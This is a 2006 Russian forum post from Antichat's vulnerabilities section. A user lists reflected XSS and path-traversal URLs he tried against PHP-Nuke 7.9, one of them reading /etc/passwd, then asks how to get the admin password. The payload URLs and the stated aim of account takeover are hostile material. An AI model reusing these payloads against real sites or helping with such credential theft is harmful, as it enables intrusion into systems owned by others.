ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Получения паса админа в PHP-Nuke 7.9
  #1  
Старый 23.11.2006, 16:38
Аватар для {BuT@Min}
{BuT@Min}
Познающий
Регистрация: 23.11.2006
Сообщений: 48
Провел на форуме:
292461

Репутация: 10
Отправить сообщение для {BuT@Min} с помощью ICQ
Exclamation Получения паса админа в PHP-Nuke 7.9

Вобшем просмотрея я видео по влому нюки 7.8 попробывал некоторое из того что описано там
Пассивные XSS:
1)(параметр username)
http://ya.ru/nuke/modules.php?name=Your_Account&code=ggg&op=mailpass wd&username=<h1>[XSS] -ответ:Регистрационный код для [XSS] отправлен.

2)(дырявый поиск)
search"style="background:url(javascript:alert()) - выдал ошибку в пустом окошке.

3)http://[target]/[nuke_dir]/modules.php?name=Search
&file=../../../../../../ ../../../etc/passwd%00 -пишет You are so cool...

4)http://[target]/[nuke_dir]/modules.php?
name=Search&author=[author]&topic=
0&min=999999999[XSS]&query=[our query]
-ответ:

Результат поиска

Ничего не найдено по вашему запросу

999999999 Предыдущие

5)http://[target]/nuke75/index.php?inside_mod=1 - ответ:The html tags you attempted to use are not allowed [ Go Back ]

Вот вроде и всё подскажите плиз как мона с помощью этого узнать пас админа логин я знаю.
если можна опишите подробнее...
P.S. Извиняйте за корявое обьяснение.Заране благодарен за помощь
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
Books PSalm69 Избранное 248 27.10.2009 04:52
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ